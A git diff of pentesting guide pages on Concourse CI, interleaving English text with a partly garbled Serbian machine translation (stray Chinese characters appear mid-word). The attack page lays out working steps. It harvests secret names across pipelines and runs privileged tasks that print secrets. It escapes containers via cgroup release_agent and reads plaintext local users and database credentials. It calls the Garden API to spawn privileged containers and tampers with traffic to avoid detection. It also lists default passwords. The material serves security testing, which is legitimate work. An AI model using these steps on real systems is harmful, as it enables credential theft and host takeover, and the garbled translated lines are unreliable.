The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
Odgovornost [checker-a](https://concourse-ci.org/checker.html) je da kontinuirano proverava nove verzije resursa. [Raspoređivač](https://concourse-ci.org/scheduler.html) je odgovoran za raspoređivanje gradnji za posao, a [traker gradnje](https://concourse-ci.org/build-tracker.html) je odgovoran za pokretanje bilo kojih raspoređenih gradnji. [Sakupljač otpada](https://concourse-ci.org/garbage-collector.html) je mehanizam za čišćenje koji uklanja sve neiskorišćene ili zastarele objekte, kao što su kontejneri i volumeni.
#### TSA: worker registration & forwarding
#### TSA: registracija radnika i prosleđivanje
The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
TSA je **prilagođeni SSH server** koji se koristi isključivo za sigurno **registraciju** [**radnika**](https://concourse-ci.org/internals.html#architecture-worker) sa [ATC](https://concourse-ci.org/internals.html#component-atc).
The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer.
TSA po **default-u sluša na portu `2222`**, i obično je smešten sa [ATC](https://concourse-ci.org/internals.html#component-atc) i nalazi se iza balansirača opterećenja.
The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
**TSA implementira CLI preko SSH veze,** podržavajući [**ove komande**](https://concourse-ci.org/internals.html#component-tsa).
#### Workers
#### Radnici
In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
Da bi izvršio zadatke, Concourse mora imati neke radnike. Ovi radnici **registruju sebe** putem [TSA](https://concourse-ci.org/internals.html#component-tsa) i pokreću usluge [**Garden**](https://github.com/cloudfoundry-incubator/garden) i [**Baggageclaim**](https://github.com/concourse/baggageclaim).
- **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**.
- **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**.
- **Garden**: Ovo je **API za upravljanje kontejnerima**, obično se pokreće na **portu 7777** putem **HTTP**.
- **Baggageclaim**: Ovo je **API za upravljanje volumenima**, obično se pokreće na **portu 7788** putem **HTTP**.
## References
## Reference
- [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html)
{{#include ../../banners/hacktricks-training.md}}

334
src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
View File

@@ -6,213 +6,202 @@
### User Roles & Permissions
Concourse comes with five roles:
Concourse dolazi sa pet uloga:
- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC.
- **owner**: Team owners can **modify everything within the team**.
- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings.
- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations.
- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines.
- _Concourse_ **Admin**: Ova uloga se dodeljuje samo vlasnicima **glavnog tima** (podrazumevani inicijalni concourse tim). Admini mogu **konfigurisati druge timove** (npr.: `fly set-team`, `fly destroy-team`...). Dozvole ove uloge ne mogu biti pogođene RBAC-om.
- **owner**: Vlasnici tima mogu **modifikovati sve unutar tima**.
- **member**: Članovi tima mogu **čitati i pisati** unutar **sredstava tima** ali ne mogu modifikovati postavke tima.
- **pipeline-operator**: Operatori pipeline-a mogu izvoditi **operacije pipeline-a** kao što su pokretanje build-ova i pinovanje resursa, međutim ne mogu ažurirati konfiguracije pipeline-a.
- **viewer**: Gledaoci tima imaju **"samo za čitanje"** pristup timu i njegovim pipeline-ima.
> [!NOTE]
> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
> Pored toga, **dozvole uloga owner, member, pipeline-operator i viewer mogu biti modifikovane** konfigurišući RBAC (konfigurišući preciznije njegove akcije). Pročitajte više o tome na: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
Napomena da Concourse **grupiše pipeline-e unutar timova**. Stoga korisnici koji pripadaju timu će moći da upravljaju tim pipeline-ima i **several Teams** može postojati. Korisnik može pripadati više timova i imati različite dozvole unutar svakog od njih.
### Vars & Credential Manager
In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\
[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
U YAML konfiguracijama možete konfigurisati vrednosti koristeći sintaksu `((_source-name_:_secret-path_._secret-field_))`.\
[Iz dokumenata:](https://concourse-ci.org/vars.html#var-syntax) **source-name je opcionalan**, i ako se izostavi, koristiće se [menadžer kredencijala na nivou klastera](https://concourse-ci.org/vars.html#cluster-wide-credential-manager), ili se vrednost može pružiti [statički](https://concourse-ci.org/vars.html#static-vars).\
**Opcionalni \_secret-field**\_ specificira polje na preuzetom tajnom podatku koje treba pročitati. Ako se izostavi, menadžer kredencijala može izabrati da pročita 'podrazumevano polje' iz preuzetog kredencijala ako polje postoji.\
Pored toga, _**secret-path**_ i _**secret-field**_ mogu biti okruženi dvostrukim navodnicima `"..."` ako **sadrže specijalne karaktere** kao što su `.` i `:`. Na primer, `((source:"my.secret"."field:1"))` će postaviti _secret-path_ na `my.secret` i _secret-field_ na `field:1`.
#### Static Vars
Static vars can be specified in **tasks steps**:
Statičke varijable mogu biti specificirane u **koracima zadataka**:
```yaml
- task: unit-1.13
file: booklit/ci/unit.yml
vars: { tag: 1.13 }
file: booklit/ci/unit.yml
vars: { tag: 1.13 }
```
Or korišćenjem sledećih `fly` **argumenata**:
Or using the following `fly` **arguments**:
- `-v` ili `--var` `NAME=VALUE` postavlja string `VALUE` kao vrednost za var `NAME`.
- `-y` ili `--yaml-var` `NAME=VALUE` parsira `VALUE` kao YAML i postavlja ga kao vrednost za var `NAME`.
- `-i` ili `--instance-var` `NAME=VALUE` parsira `VALUE` kao YAML i postavlja ga kao vrednost za instancu var `NAME`. Pogledajte [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) da biste saznali više o instancama var.
- `-l` ili `--load-vars-from` `FILE` učitava `FILE`, YAML dokument koji sadrži mapiranje imena var na vrednosti, i postavlja ih sve.
- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`.
- `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`.
- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
#### Upravljanje akreditivima
#### Credential Management
Postoje različiti načini na koje se **Upravljač akreditivima može specificirati** u pipeline-u, pročitajte kako na [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
Pored toga, Concourse podržava različite upravljače akreditivima:
There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
Moreover, Concourse supports different credential managers:
- [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html)
- [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html)
- [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html)
- [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html)
- [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html)
- [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html)
- [Caching credentials](https://concourse-ci.org/creds-caching.html)
- [Redacting credentials](https://concourse-ci.org/creds-redacting.html)
- [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html)
- [Upravljač akreditivima Vault](https://concourse-ci.org/vault-credential-manager.html)
- [Upravljač akreditivima CredHub](https://concourse-ci.org/credhub-credential-manager.html)
- [Upravljač akreditivima AWS SSM](https://concourse-ci.org/aws-ssm-credential-manager.html)
- [Upravljač akreditivima AWS Secrets Manager](https://concourse-ci.org/aws-asm-credential-manager.html)
- [Upravljač akreditivima Kubernetes](https://concourse-ci.org/kubernetes-credential-manager.html)
- [Upravljač akreditivima Conjur](https://concourse-ci.org/conjur-credential-manager.html)
- [Keširanje akreditiva](https://concourse-ci.org/creds-caching.html)
- [Redigovanje akreditiva](https://concourse-ci.org/creds-redacting.html)
- [Ponovno pokušavanje neuspešnih preuzimanja](https://concourse-ci.org/creds-retry-logic.html)
> [!CAUTION]
> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
> Imajte na umu da ako imate neku vrstu **pristupa za pisanje Concourse-u** možete kreirati poslove za **ekstrakciju tih tajni** jer Concourse mora imati mogućnost pristupa njima.
### Concourse Enumeration
### Concourse Enumeracija
In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file.
Da biste enumerisali Concourse okruženje, prvo morate **prikupiti važeće akreditive** ili pronaći **autentifikovani token** verovatno u `.flyrc` konfiguracionom fajlu.
#### Login and Current User enum
#### Prijava i trenutni korisnik enum
- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
- Get configured **targets**:
- `fly targets`
- Get if the configured **target connection** is still **valid**:
- `fly -t <target> status`
- Get **role** of the user against the indicated target:
- `fly -t <target> userinfo`
- Da biste se prijavili, morate znati **endpoint**, **ime tima** (podrazumevano je `main`) i **tim kojem korisnik pripada**:
- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
- Dobijte konfigurirane **ciljeve**:
- `fly targets`
- Proverite da li je konfigurisana **veza sa ciljem** još uvek **važeća**:
- `fly -t <target> status`
- Dobijte **ulogu** korisnika u odnosu na navedeni cilj:
- `fly -t <target> userinfo`
> [!NOTE]
> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials.
> Imajte na umu da je **API token** **sačuvan** u `$HOME/.flyrc` podrazumevano, dok pretražujete mašine mogli biste pronaći akreditive tamo.
#### Teams & Users
#### Timovi i korisnici
- Get a list of the Teams
- `fly -t <target> teams`
- Get roles inside team
- `fly -t <target> get-team -n <team-name>`
- Get a list of users
- `fly -t <target> active-users`
- Dobijte listu timova
- `fly -t <target> teams`
- Dobijte uloge unutar tima
- `fly -t <target> get-team -n <team-name>`
- Dobijte listu korisnika
- `fly -t <target> active-users`
#### Pipelines
- **List** pipelines:
- `fly -t <target> pipelines -a`
- **Get** pipeline yaml (**sensitive information** might be found in the definition):
- `fly -t <target> get-pipeline -p <pipeline-name>`
- Get all pipeline **config declared vars**
- `for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them):
- **Lista** pipelines:
- `fly -t <target> pipelines -a`
- **Dobijte** pipeline yaml (**osetljive informacije** mogu se naći u definiciji):
- `fly -t <target> get-pipeline -p <pipeline-name>`
- Dobijte sve **konfiguracione varijable** pipeline-a
- `for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
- Dobijte sve **nazive tajnih pipeline-a** (ako možete kreirati/izmeniti posao ili preuzeti kontejner, mogli biste ih ekstraktovati):
```bash
rm /tmp/secrets.txt;
for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do
echo $pipename;
fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
echo "";
echo $pipename;
fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
echo "";
done
echo ""
echo "ALL SECRETS"
cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt
```
#### Kontejneri i Radnici
#### Containers & Workers
- Lista **radnika**:
- `fly -t <target> workers`
- Lista **kontejnera**:
- `fly -t <target> containers`
- Lista **buildova** (da vidite šta se izvršava):
- `fly -t <target> builds`
- List **workers**:
- `fly -t <target> workers`
- List **containers**:
- `fly -t <target> containers`
- List **builds** (to see what is running):
- `fly -t <target> builds`
### Concourse Napadi
### Concourse Attacks
#### Credentials Brute-Force
#### Brute-Force Akcija na Kredencijale
- admin:admin
- test:test
#### Secrets and params enumeration
#### Enumeracija Tajni i Parametara
In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them.
U prethodnom odeljku smo videli kako možete **dobiti sve nazive i varijable tajni** koje koristi pipeline. **Varijable mogu sadržati osetljive informacije** i naziv **tajni će biti koristan kasnije za pokušaj krađe**.
#### Session inside running or recently run container
If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `<pipeline>/<job>` **container** using:
#### Sesija unutar pokrenutog ili nedavno pokrenutog kontejnera
Ako imate dovoljno privilegija (**član uloga ili više**) moći ćete da **listaš pipelines i uloge** i jednostavno dobijete **sesiju unutar** `<pipeline>/<job>` **kontejnera** koristeći:
```bash
fly -t tutorial intercept --job pipeline-name/job-name
fly -t tutorial intercept # To be presented a prompt with all the options
```
Sa ovim dozvolama možda ćete moći da:
With these permissions you might be able to:
- **Uk盗ite tajne** unutar **kontejnera**
- Pokušate da **pobegnete** na čvor
- Enumerišete/Iskoristite **cloud metadata** endpoint (iz poda i sa čvora, ako je moguće)
- **Steal the secrets** inside the **container**
- Try to **escape** to the node
- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
#### Pipeline Creation/Modification
If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
#### Kreiranje/Izmena Pipeline-a
Ako imate dovoljno privilegija (**član uloga ili više**) moći ćete da **kreirate/menjate nove pipeline-ove.** Pogledajte ovaj primer:
```yaml
jobs:
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker hub by default
run:
path: sh
args:
- -cx
- |
echo "$SUPER_SECRET"
sleep 1000
params:
SUPER_SECRET: ((super.secret))
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker hub by default
run:
path: sh
args:
- -cx
- |
echo "$SUPER_SECRET"
sleep 1000
params:
SUPER_SECRET: ((super.secret))
```
Sa **modifikacijom/kreiranjem** novog pipeline-a moći ćete da:
With the **modification/creation** of a new pipeline you will be able to:
- **Uk盗** **tajne** (putem njihovog ispisivanja ili ulaskom u kontejner i pokretanjem `env`)
- **Pobegnete** na **čvor** (dajući vam dovoljno privilegija - `privileged: true`)
- Enumerišete/Iskoristite **cloud metadata** endpoint (iz poda i iz čvora)
- **Obrišete** kreirani pipeline
- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`)
- **Escape** to the **node** (by giving you enough privileges - `privileged: true`)
- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
- **Delete** created pipeline
#### Execute Custom Task
This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**):
#### Izvršite Prilagođeni Zadatak
Ovo je slično prethodnoj metodi, ali umesto modifikacije/kreiranja celog novog pipeline-a, možete **samo izvršiti prilagođeni zadatak** (što će verovatno biti mnogo **diskretnije**):
```yaml
# For more task_config options check https://concourse-ci.org/tasks.html
platform: linux
image_resource:
type: registry-image
source:
repository: ubuntu
type: registry-image
source:
repository: ubuntu
run:
path: sh
args:
- -cx
- |
env
sleep 1000
path: sh
args:
- -cx
- |
env
sleep 1000
params:
SUPER_SECRET: ((super.secret))
SUPER_SECRET: ((super.secret))
```
```bash
fly -t tutorial execute --privileged --config task_config.yml
```
#### Bekstvo na čvor iz privilegovane zadatke
#### Escaping to the node from privileged task
In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
In the following PoC we are going to use the release_agent to escape with some small modifications:
U prethodnim sekcijama smo videli kako da **izvršimo privilegovanu zadatak sa concourse**. Ovo neće dati kontejneru potpuno isti pristup kao privilegovana oznaka u docker kontejneru. Na primer, nećete videti uređaj datoteke čvora u /dev, tako da bi bekstvo moglo biti "kompleksnije".
U sledećem PoC-u ćemo koristiti release_agent da pobegnemo sa nekim malim izmenama:
```bash
# Mounts the RDMA cgroup controller and create a child cgroup
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
@@ -270,14 +259,12 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
> [!WARNING]
> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node
> Kao što ste možda primetili, ovo je samo [**redovni release_agent beg**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) samo modifikujući putanju cmd-a u čvoru
#### Escaping to the node from a Worker container
A regular release_agent escape with a minor modification is enough for this:
#### Beg u čvor iz Worker kontejnera
Redovni release_agent beg sa manjom modifikacijom je dovoljan za ovo:
```bash
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
@@ -304,13 +291,11 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
#### Bekstvo na čvor iz Web kontejnera
#### Escaping to the node from the Web container
Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
However, it stores **local credentials in clear text**:
Čak i ako web kontejner ima neke odbrane onemogućene, **ne radi kao uobičajen privilegovan kontejner** (na primer, **ne možete** **montirati** i **kapaciteti** su veoma **ograničeni**, tako da su svi laki načini za bekstvo iz kontejnera beskorisni).
Međutim, čuva **lokalne akreditive u čistom tekstu**:
```bash
cat /concourse-auth/local-users
test:test
@@ -319,11 +304,9 @@ env | grep -i local_user
CONCOURSE_MAIN_TEAM_LOCAL_USER=test
CONCOURSE_ADD_LOCAL_USER=test:test
```
Možete koristiti te akreditive da **se prijavite na veb server** i **napravite privilegovanu kontejner i pobegnete na čvor**.
You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**.
In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info):
U okruženju takođe možete pronaći informacije za **pristup postgresql** instanci koju koristi concourse (adresa, **korisničko ime**, **lozinka** i baza podataka među ostalim informacijama):
```bash
env | grep -i postg
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
@@ -344,39 +327,35 @@ select * from refresh_token;
select * from teams; #Change the permissions of the users in the teams
select * from users;
```
#### Abusing Garden Service - Not a real Attack
#### Zloupotreba Garden Service - Nije pravi napad
> [!WARNING]
> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before
> Ovo su samo neke zanimljive beleške o servisu, ali pošto sluša samo na localhost-u, ove beleške neće imati nikakav uticaj koji već nismo iskoristili ranije
By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections:
Podrazumevano, svaki concourse radnik će pokretati [**Garden**](https://github.com/cloudfoundry/garden) servis na portu 7777. Ovaj servis koristi Web master da označi radniku **šta treba da izvrši** (preuzmi sliku i pokreni svaku zadatak). Ovo zvuči prilično dobro za napadača, ali postoje neka dobra zaštita:
- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker.
- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service.
Concourse workers run with high container privileges:
- To je samo **izloženo lokalno** (127..0.0.1) i mislim da kada se radnik autentifikuje prema Web-u sa posebnim SSH servisom, stvara se tunel tako da web server može **da komunicira sa svakim Garden servisom** unutar svakog radnika.
- Web server **prati pokrenute kontejnere svake nekoliko sekundi**, i **neočekivani** kontejneri se **brišu**. Dakle, ako želite da **pokrenete prilagođeni kontejner** morate da **manipulišete** sa **komunikacijom** između web servera i garden servisa.
Concourse radnici rade sa visokim privilegijama kontejnera:
```
Container Runtime: docker
Has Namespaces:
pid: true
user: false
pid: true
user: false
AppArmor Profile: kernel
Capabilities:
BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
Seccomp: disabled
```
However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated.
Međutim, tehnike poput **montiranja** /dev uređaja čvora ili release_agent **neće raditi** (jer pravi uređaj sa datotečnim sistemom čvora nije dostupan, samo virtuelni). Ne možemo pristupiti procesima čvora, pa je bekstvo iz čvora bez kernel exploit-a komplikovano.
> [!NOTE]
> In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**.
> U prethodnom odeljku smo videli kako da pobegnemo iz privilegovanog kontejnera, tako da ako možemo **izvršiti** komande u **privilegovanom kontejneru** koji je kreirao **trenutni** **radnik**, mogli bismo **pobegnuti na čvor**.
Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
**Getting inside a running privileged container**
Imajte na umu da sam igrajući se sa concourse-om primetio da kada se novi kontejner pokrene da bi nešto izvršio, procesi kontejnera su dostupni iz radničkog kontejnera, tako da je to kao da kontejner kreira novi kontejner unutar sebe.
**Ulazak u pokrenuti privilegovani kontejner**
```bash
# Get current container
curl 127.0.0.1:7777/containers
@@ -389,30 +368,26 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
# Execute a new process inside a container
## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
```
**Kreiranje novog privilegovanog kontejnera**
**Creating a new privileged container**
You can very easily create a new container (just run a random UID) and execute something on it:
Možete vrlo lako kreirati novi kontejner (samo pokrenite nasumični UID) i izvršiti nešto na njemu:
```bash
curl -X POST http://127.0.0.1:7777/containers \
-H 'Content-Type: application/json' \
-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
-H 'Content-Type: application/json' \
-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
# Wget will be stucked there as long as the process is being executed
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
```
However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers:
Međutim, veb server proverava svake nekoliko sekundi kontejnere koji se izvršavaju, i ako se otkrije neočekivani, biće obrisan. Pošto se komunikacija odvija u HTTP-u, mogli biste da manipulišete komunikacijom kako biste izbegli brisanje neočekivanih kontejnera:
```
GET /containers HTTP/1.1.
Host: 127.0.0.1:7777.
@@ -434,13 +409,8 @@ Host: 127.0.0.1:7777.
User-Agent: Go-http-client/1.1.
Accept-Encoding: gzip.
```
## References
## Референце
- https://concourse-ci.org/vars.html
{{#include ../../banners/hacktricks-training.md}}

138
src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
View File

@@ -8,19 +8,16 @@
#### With Docker-Compose
This docker-compose file simplifies the installation to do some tests with concourse:
Ova docker-compose datoteka pojednostavljuje instalaciju za izvođenje nekih testova sa concourse:
```bash
wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml
docker-compose up -d
```
Možete preuzeti komandnu liniju `fly` za vaš operativni sistem sa veba na `127.0.0.1:8080`
You can download the command line `fly` for your OS from the web in `127.0.0.1:8080`
#### With Kubernetes (Recommended)
You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
#### Sa Kubernetes-om (Preporučeno)
Možete lako implementirati concourse u **Kubernetes** (na **minikube** na primer) koristeći helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
```bash
brew install helm
helm repo add concourse https://concourse-charts.storage.googleapis.com/
@@ -31,94 +28,90 @@ helm install concourse-release concourse/concourse
# If you need to delete it
helm delete concourse-release
```
After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets:
После генерисања concourse env, можете генерисати тајну и дати приступ SA који ради у concourse web-у да приступи K8s тајнама:
```yaml
echo 'apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: read-secrets
name: read-secrets
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get"]
resources: ["secrets"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: read-secrets-concourse
name: read-secrets-concourse
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: read-secrets
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: read-secrets
subjects:
- kind: ServiceAccount
name: concourse-release-web
namespace: default
name: concourse-release-web
namespace: default
---
apiVersion: v1
kind: Secret
metadata:
name: super
namespace: concourse-release-main
name: super
